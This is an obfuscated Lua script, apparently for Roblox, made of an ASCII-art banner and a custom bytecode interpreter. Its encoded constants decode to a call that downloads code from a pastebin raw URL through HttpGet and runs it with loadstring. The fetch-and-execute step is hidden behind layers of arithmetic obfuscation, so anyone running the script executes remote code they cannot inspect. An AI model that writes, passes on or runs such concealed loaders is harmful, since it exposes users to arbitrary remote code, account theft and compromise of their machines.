--[[
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@//////////////////////////////(@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@(///////////////////////////////////////%@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@////////////////////////////((((///////////(@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@%///////////////////((%@@%#(//////////////////(@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@#////////////////((@@@%/////////////////////////@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@%//////////////(&@@@(///////////////////////////%@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@(/////////////(@@@(//////////////////////////////&@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@////////////(@@@%////////////////////////////////%@@@@@@@@@@@@@
@@@@@@@@@@@@@@@////////////(@@@//////////////////////////////////(@@@@@@@@@@@@@@
@@@@@@@@@@@@@@///////////(@@@#//////////////////////////////////#@@@@@@@@@@@@@@@
@@@@@@@@@@@@@///////////@@@@///////////////////////////////////&@@@@@@@@@@@@@@@@
@@@@@@@@@@@@//////////@@@@%///////////////////////////////////@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@//////////@@@@(///////////////////////////////////@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@//////////@@@@%///////////////////////////////////@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@/////////@@@@@//////////////////////////////////(@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@////////@@@@@//////////////////////////////////@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@///////(@@@@(/////////////////////////////////&@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@///////@@@@//////////////////////////////////@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@#//////(@@@/////////////////////////////////(@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@//////////////////////////////////////////(@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@/////////////////////////////////////////(@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@&////(((((//////////////////////////////@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@(////(@@@@@@@@@@@#((//////////////&@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@/////(@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@////(@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=v2(v0(v30,16));if v19 then local v89=v5(v82,v19);v19=nil;return v89;else return v82;end end end);local function v20(v31,v32,v33) if v33 then local v83=0 -0 ;local v84;while true do if (v83==(0 -(877 -(282 + 595)))) then v84=(v31/((3 -1)^(v32-((1639 -(1523 + 114)) -1))))%((621 -(555 + 64))^(((v33-(932 -(857 + 74))) -(v32-1)) + (569 -(330 + 37 + 201)))) ;return v84-(v84%(928 -(214 + 713))) ;end end else local v85=2^(v32-(1 + 0)) ;return (((v31%(v85 + v85))>=v85) and 1) or (0 + 0) ;end end local function v21() local v34=0;local v35;while true do if (v34==(1 -0)) then return v35;end if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + (1066 -(68 + (4341 -3344))) ;v34=1271 -(226 + 1044) ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (119 -(32 + 85)) );v18=v18 + 2 + 0 ;return (v37 * (57 + 199)) + v36 ;end local function v23() local v38=(1954 -(915 + 82)) -(892 + 65) ;local v39;local v40;local v41;local v42;while true do if (v38==((5 -3) -1)) then return (v42 * 16777216) + (v41 * (156337 -90801)) + (v40 * (472 -216)) + v39 ;end if (v38==(0 -(0 + 0))) then v39,v40,v41,v42=v1(v16,v18,v18 + (353 -(87 + 263)) );v18=v18 + (6 -2) ;v38=181 -(67 + 113) ;end end end local function v24() local v43=v23();local v44=v23();local v45=1 -0 ;local v46=(v20(v44,1188 -(1069 + 118) ,(37 + 8) -25 ) * (2^32)) + v43 ;local v47=v20(v44,45 -24 ,31);local v48=((v20(v44,6 + 26 )==(1 -0)) and  -((773 -(201 + 571)) + 0)) or (792 -((1506 -(116 + 1022)) + 423)) ;if (v47==((0 -0) -0)) then if (v46==((11 + 7) -((36 -26) + 8))) then return v48 * (0 -0) ;else v47=443 -(416 + 26) ;v45=0 -(0 -0) ;end elseif (v47==(879 + (2027 -(814 + 45)))) then return ((v46==(0 -0)) and (v48 * ((439 -(145 + 293))/(430 -(44 + 386))))) or (v48 * NaN) ;end return v8(v48,v47-(2509 -(998 + 488)) ) * (v45 + (v46/((1 + 1)^(127 -75)))) ;end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(0 + 0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;local v51={};for v65=1, #v50 do v51[v65]=v2(v1(v3(v50,v65,v65)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;while true do if ((2 -1)~=v52) then else v57=v23();v58={};for v90=697 -(601 + 95) ,v57 do local v91=1665 -(970 + 695) ;local v92;local v93;local v94;while true do if (v91==(1 -0)) then v94=nil;while true do if (v92==1) then if (v93==(1 -0)) then v94=v21()~=(0 + 0) ;elseif (v93==2) then v94=v24();elseif (v93==(1993 -(582 + 1408))) then v94=v25();end v58[v90]=v94;break;end if ((0 -0)~=v92) then else local v111=0;local v112;while true do if (v111==(1474 -(1329 + 145))) then v112=971 -(140 + 831) ;while true do if (v112==1) then v92=1;break;end if ((1850 -(1409 + 441))~=v112) then else v93=v21();v94=nil;v112=719 -(15 + 703) ;end end break;end end end end break;end if (v91==0) then v92=0 + 0 ;v93=nil;v91=1825 -(1195 + 629) ;end end end v56[441 -(262 + 176) ]=v21();v52=2;end if (v52~=2) then else for v95=1722 -(345 + 1376) ,v23() do local v96=688 -(198 + 490) ;local v97;while true do if (v96==(0 -0)) then v97=v21();if (v20(v97,1,781 -(162 + 618) )==(0 + 0)) then local v106=0 -0 ;local v107;local v108;local v109;while true do if (v106~=(0 + 0)) then else local v135=0 -0 ;while true do if (v135~=(1206 -(696 + 510))) then else v107=v20(v97,3 -1 ,1265 -(1091 + 171) );v108=v20(v97,1640 -(1373 + 263) ,1006 -(451 + 549) );v135=1 + 0 ;end if (v135~=(3 -2)) then else v106=1;break;end end end if (v106==2) then if (v20(v108,3 -2 ,1 -0 )==(375 -(123 + 251))) then v109[2 -0 ]=v58[v109[9 -7 ]];end if (v20(v108,700 -(208 + 490) ,1 + 1 )==(1 + 0)) then v109[839 -(660 + 176) ]=v58[v109[3]];end v106=3 + 0 ;end if (v106==(1 + 2)) then if (v20(v108,1 + 2 ,3)==(203 -(14 + 188))) then v109[679 -(534 + 141) ]=v58[v109[4]];end v53[v95]=v109;break;end if (v106~=(1 -0)) then else local v137=0 + 0 ;while true do if ((1467 -(899 + 568))==v137) then v109={v22(),v22(),nil,nil};if (v107==0) then local v169=0;while true do if (v169==(0 -0)) then v109[6 -3 ]=v22();v109[294 -(60 + 230) ]=v22();break;end end elseif (v107==(573 -(426 + 146))) then v109[4 -1 ]=v23();elseif (v107==2) then v109[8 -5 ]=v23() -((1458 -(282 + 1174))^16) ;elseif (v107~=(814 -(569 + 242))) then else local v174=0 + 0 ;local v175;while true do if (v174~=(0 + 0)) then else v175=396 -(115 + 281) ;while true do if (v175==(0 -0)) then v109[3 + 0 ]=v23() -((1026 -(706 + 318))^(1267 -(721 + 530))) ;v109[4]=v22();break;end end break;end end end v137=1272 -(945 + 326) ;end if (v137==(2 -1)) then v106=7 -5 ;break;end end end end end break;end end end for v98=868 -(550 + 317) ,v23() do v54[v98-1 ]=v28();end return v56;end if (v52==(0 -0)) then v53={};v54={};v55={};v56={v53,v54,nil,v55};v52=1 + 0 ;end end end local function v29(v59,v60,v61) local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...) local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v86=0,v75 do if (v86>=v69) then v73[v86-v69 ]=v74[v86 + 1 ];else v77[v86]=v74[v86 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do local v87=0;while true do if (v87==1) then if (v80<=3) then if (v80<=1) then if (v80>0) then v77[v79[2]]();else local v113=0;local v114;local v115;local v116;local v117;while true do if (v113==2) then for v163=v114,v72 do v117=v117 + 1 ;v77[v163]=v115[v117];end break;end if (1==v113) then v72=(v116 + v114) -1 ;v117=0;v113=2;end if (v113==0) then v114=v79[2];v115,v116=v70(v77[v114](v13(v77,v114 + 1 ,v79[3])));v113=1;end end end elseif (v80==2) then do return;end else v77[v79[2]]=v61[v79[3]];end elseif (v80<=5) then if (v80==4) then v77[v79[2]]=v79[3];else local v122=0;local v123;local v124;local v125;local v126;local v127;while true do if (v122==3) then v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v127=v79[2];v122=4;end if (v122==2) then v127=v79[2];v126=v77[v79[3]];v77[v127 + 1 ]=v126;v77[v127]=v126[v79[4]];v71=v71 + 1 ;v122=3;end if (v122==5) then v79=v67[v71];v127=v79[2];v77[v127]=v77[v127](v13(v77,v127 + 1 ,v72));v71=v71 + 1 ;v79=v67[v71];v122=6;end if (v122==4) then v124,v125=v70(v77[v127](v13(v77,v127 + 1 ,v79[3])));v72=(v125 + v127) -1 ;v123=0;for v166=v127,v72 do v123=v123 + 1 ;v77[v166]=v124[v123];end v71=v71 + 1 ;v122=5;end if (v122==0) then v123=nil;v124,v125=nil;v126=nil;v127=nil;v77[v79[2]]=v61[v79[3]];v122=1;end if (v122==6) then v77[v79[2]]();v71=v71 + 1 ;v79=v67[v71];do return;end break;end if (v122==1) then v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v61[v79[3]];v71=v71 + 1 ;v79=v67[v71];v122=2;end end end elseif (v80>6) then local v128=v79[2];local v129=v77[v79[3]];v77[v128 + 1 ]=v129;v77[v128]=v129[v79[4]];else local v133=v79[2];v77[v133]=v77[v133](v13(v77,v133 + 1 ,v72));end v71=v71 + 1 ;break;end if (0==v87) then v79=v67[v71];v80=v79[1];v87=1;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F6A364A436A62505800083O0012053O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);